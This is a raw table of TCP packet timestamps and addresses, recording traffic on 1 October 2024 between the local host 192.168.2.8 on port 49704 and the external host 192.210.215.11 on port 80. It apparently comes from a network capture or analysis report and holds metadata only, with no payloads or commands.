                          Oct 1, 2024 07:38:14.453001976 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.453001976 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.453006983 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453175068 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453190088 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453206062 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453228951 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453242064 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.453242064 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.453242064 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.453242064 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.453242064 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.453244925 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453258991 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453274012 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453295946 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453305006 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.453305006 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.453305006 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.453310966 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453325987 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453345060 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453358889 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453373909 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453387022 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.453387022 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.453387022 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.453387022 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.453389883 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453406096 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453419924 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453434944 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453450918 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453459978 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.453459978 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.453459978 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.453465939 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453480959 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453483105 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.453505993 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453521013 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453536034 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453551054 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453564882 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453578949 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453594923 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453594923 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.453594923 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.453594923 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.453594923 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.453594923 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.453608990 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453624964 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453669071 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.453670025 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.453670025 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.453871965 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453886986 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.453902960 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454046011 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454066992 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454082012 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454094887 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454109907 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454123020 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454123020 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454123974 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454123020 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454123020 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454138994 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454154015 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454175949 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454190016 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454211950 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454225063 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454231977 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454231977 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454231977 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454231977 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454241991 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454257965 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454283953 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454298973 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454313993 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454327106 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454328060 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454329014 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454328060 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454328060 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454328060 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454353094 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454354048 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454354048 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454370022 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454391003 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454405069 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454418898 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454426050 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454427004 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454427004 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454427004 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454433918 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454451084 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454467058 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454489946 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454504013 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454508066 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454508066 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454508066 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454508066 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454508066 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454519033 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454530001 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454535007 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454550028 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454565048 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454582930 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454606056 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454621077 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454626083 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454626083 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454626083 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454626083 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454626083 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454636097 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454643965 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454651117 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454668045 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454683065 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454705000 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454720020 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454724073 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454724073 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454724073 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454724073 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454724073 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454735041 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454749107 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454765081 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454780102 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454786062 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454786062 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454786062 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454786062 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454794884 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454809904 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454823017 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454838037 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.454879999 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454879999 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454879999 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454879999 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.454879999 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.496700048 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.496721983 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.496752024 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.496773005 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.496788979 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.496803999 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.496825933 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.496840954 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.496886015 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.496886015 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.496886015 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.496886015 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.496886969 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.541255951 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541279078 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541304111 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541320086 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541336060 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541351080 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541367054 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541383028 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541385889 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.541385889 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.541385889 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.541420937 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.541420937 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.541455030 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541471004 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541486025 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541505098 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541511059 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.541522980 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541538954 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541558027 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541568041 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.541568041 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.541574001 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541580915 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.541589022 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541604996 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541619062 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541630983 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.541630983 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.541635036 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541714907 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541728973 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541743994 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541769028 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541785002 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541790009 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.541790009 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.541790009 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.541790009 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.541790009 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.541798115 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541812897 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541827917 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541842937 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541860104 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541872025 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.541872025 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.541872025 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.541872025 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.541872025 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.541873932 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541887999 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.541898012 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.541918993 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.541949034 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541964054 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.541977882 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542030096 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542030096 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542030096 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542085886 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542112112 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542134047 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542148113 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542155027 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542155027 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542164087 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542179108 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542186022 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542192936 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542201042 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542206049 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542213917 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542228937 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542243004 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542257071 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542275906 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542275906 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542275906 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542275906 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542278051 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542293072 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542308092 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542330980 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542345047 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542361021 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542376041 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542377949 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542377949 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542377949 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542377949 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542377949 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542392015 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542406082 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542421103 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542433977 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542448997 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542463064 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542476892 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542480946 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542480946 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542480946 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542480946 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542480946 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542512894 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542535067 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542551041 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542566061 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542579889 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542606115 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542606115 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542606115 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542606115 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542606115 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542707920 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542725086 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542747021 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542761087 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542777061 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542800903 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542815924 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542830944 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542844057 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542844057 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542844057 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542844057 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542844057 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542845011 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542860985 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542876959 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542891026 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542906046 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542921066 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542923927 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542923927 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542923927 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542923927 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.542936087 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.542956114 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543036938 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543051004 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543065071 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543078899 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543078899 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543078899 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543078899 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543078899 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543095112 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543109894 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543175936 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543190002 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543205023 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543219090 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543225050 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543225050 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543225050 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543225050 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543225050 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543235064 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543250084 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543265104 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543278933 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543303013 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543315887 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543329000 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543329000 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543329954 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543329954 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543329954 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543329954 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543346882 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543369055 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543394089 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543411016 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543421984 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543421984 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543421984 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543421984 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543421984 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543427944 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543521881 CEST8049704192.210.215.11192.168.2.8
